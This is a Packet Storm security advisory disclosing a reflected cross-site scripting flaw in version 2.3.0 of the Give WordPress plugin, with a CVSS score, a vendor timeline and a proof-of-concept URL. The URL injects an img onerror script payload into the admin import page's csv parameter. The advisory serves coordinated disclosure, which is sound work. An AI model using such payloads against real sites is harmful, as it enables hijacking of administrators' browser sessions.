WordPress Give 2.3.0 Cross Site Scripting

2019-02-06T00:00:00
ID PACKETSTORM:151551
Type packetstorm
Reporter Tim Coen
Modified 2019-02-06T00:00:00

Description

                                        
                                            ` * Vulnerability: XSS  
* Affected Software: [Give](https://wordpress.org/plugins/give/)  
* Affected Version: 2.3.0  
* Patched Version: 2.3.1  
* CVE: not requested  
* Risk: Medium  
* Vendor Contacted: 11/24/2018  
* Vendor Fix: 12/13/2018  
* Public Disclosure: 02/05/2019  
* Credit: Tim Coen  
  
##### CVSS  
  
6.1 Medium  
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)  
  
##### Overview  
  
The Give WordPress plugin is vulnerable to reflected XSS as it echoes  
various parameter without proper encoding.  
  
##### Proof of Concept  
  
  
http://localhost/wordpress/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=import&importer-type=import_donations&step=3&mapto%5B0%5D=email&mapto%5B1%5D=first_name&mapto%5B2%5D=amount&mapto%5B3%5D=form_id&csv='"><img+src%3dx+onerror%3dalert(1)>  
  
##### Timeline  
  
- 11/24/2018 Asked for email address via contact form  
- 11/24/2018 Vendor responds, advisory sent  
- 12/13/2018 Vendor releases fix  
- 02/05/2019 Confirmed fix & Disclosure  
  
##### Details & Full Advisory URL  
  
https://security-consulting.icu/blog/2019/02/wordpress-give-xss/  
  
--   
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89  
  
  
`